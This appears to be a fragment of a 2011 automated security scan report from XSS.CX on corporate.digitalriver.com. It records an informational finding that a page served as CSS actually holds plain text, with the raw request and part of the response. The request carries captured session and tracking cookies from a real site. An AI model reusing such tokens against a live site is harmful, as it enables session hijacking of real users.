HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMTContent-Type: text/css;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=139823604095,0) Date: Sun, 04 Sep 2011 14:18:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 6623 <!-- REQUEST ID: TIME=1315145912475:NODE=c1a5301:THREAD=39207 --> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ThemeID=16015700&ceid=1755819...[SNIP]...
6.3. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage
Issue detail
The response contains the following Content-type statement:Content-Type: text/css;charset=UTF-8 The response states that it contains CSS . However, it actually appears to contain plain text .
Request
GET /store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.1.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.2.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145848307; fcC=X=C708273219&Y=1315145848489&FV=10&H=1315145848307&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMTContent-Type: text/css;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131233565319,0) Date: Sun, 04 Sep 2011 14:16:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 6600 <!-- REQUEST ID: TIME=1315145811508:NODE=c1a5301:THREAD=94 --> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ceid=175581900&cename=TopHeaderP...[SNIP]...
Report generated by XSS.CX at Sun Sep 04 08:24:54 GMT-06:00 2011.